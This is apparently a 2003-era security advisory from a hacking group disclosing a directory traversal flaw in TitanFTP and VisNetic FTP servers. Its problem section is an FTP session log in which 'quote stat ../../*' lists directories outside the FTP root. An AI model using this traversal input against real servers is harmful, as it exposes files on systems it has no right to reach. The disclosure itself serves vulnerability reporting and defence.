-----BEGIN PGP SIGNED MESSAGE----- ################################################################ # _____ __ __ ___ # # ........\ \.| |.| |/ \........ # # : / \| | | | __> : # # : / _ \ |_| | / __ : # # : / / \ | <_/ \ : # # :..../ _/ / _ | ` \....: # # : \_________/__| |__|_______/ : # # : Damage Hacking Group : # # : Security Advisory : # # :.............................: # # # # http://www.dhgroup.org # #b d# ##b,________________________________________________________.d## | | Products: TitanFTP server v2.02 build 99 & VisNetic FTP server v2.00 build 94 Authors: www.titanftp.com www.deerfield.com | Vulnerability: directory traversal | #--------------------------------------------------------------# | | Overview: ~~~~~~~~~ A FTP servers. They seems like a brothers and have identical bugs :) | | #--------------------------------------------------------------# | | Problem: ~~~~~~~~ D:\WINNT>ftp 127.0.0.1 Connecting to 127.0.0.1. 220 Titan FTP Server 2.02.99 Ready. User (127.0.0.1:(none)): anonymous 331 User name okay, need password. Password: 230-Welcome anonymous from 127.0.0.1. You are now logged into the server. 230 User logged in, proceed. ftp> dir 200 PORT command successful. 150 File status okay; about to open data connection. total 8 d--------- 1 owner group 512 May 24 20:35 . d--------- 1 owner group 512 May 24 20:35 .. d--------- 1 owner group 512 May 24 20:35 bin d--------- 1 owner group 512 May 24 20:35 incoming d-wx-wx--- 1 owner group 512 May 24 20:35 pub d--------- 1 owner group 512 May 24 20:35 usr - -rw------- 1 owner group 6 May 24 21:45 test2.txt 226 Closing data connection. Transferred 451 bytes. ftp: 451 bytes received in 0,01seconds 45,10 (ΚΑ/ρεκ). ftp> quote stat ../* 212-Status of * d--------- 1 owner group 512 May 24 20:35 . d--------- 1 owner group 512 May 24 20:35 .. d--------- 1 owner group 512 May 24 20:35 local - -rw------- 1 owner group 6 May 24 21:45 test1.txt d--------- 1 owner group 512 May 24 20:35 local 212 End of Status. ftp> quote stat ../../* 212-Status of * d--------- 1 owner group 512 May 24 20:33 srtFtpLogs d--------- 1 owner group 512 May 24 20:35 srtFtpData - -rw------- 1 owner group 6 May 24 21:51 test.txt - -rw------- 1 owner group 29632 May 25 00:25 xpl.txt d--------- 1 owner group 512 May 11 2002 Documents and Settings d--------- 1 owner group 512 May 13 22:27 Program Files d--------- 1 owner group 512 May 22 17:10 WINNT d--------- 1 owner group 512 May 24 20:35 local 212 End of Status. ftp> close 221 Session Ended. Downloaded 0KB, Uploaded 0KB. Goodbye anonymous from 127.0.0.1. ftp> quit D:\WINNT>^_^ | | #--------------------------------------------------------------# | Exploit: | ~~~~~~~~ none | | #--------------------------------------------------------------# | :wow: | ~~~ NeKr0 /DHG www.dhgroup.org | | #______________________________________________________________# \___________________________da_end___________________________/ Best regards www.dhgroup.org D4rkGr3y icq 540981 -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use iQCVAwUBPtaTXm4LIpseSJmPAQFTVQP/a2gXfMTKitPzfYEQMpeMjcAlyWs6ASUv xdAzJ4H/tk/moTQpZFNMnRe/KTjyiWuRvEytVa8jGx4VIzg+I8YesolWs2GFR3SA esle9UjEHA2F8/3HtcoaXLtXHROQp2geA5d936z+nroZ2ePJkwZ7OLhbnz5NJ0mu B2urs9WG0z0= =WiSs -----END PGP SIGNATURE-----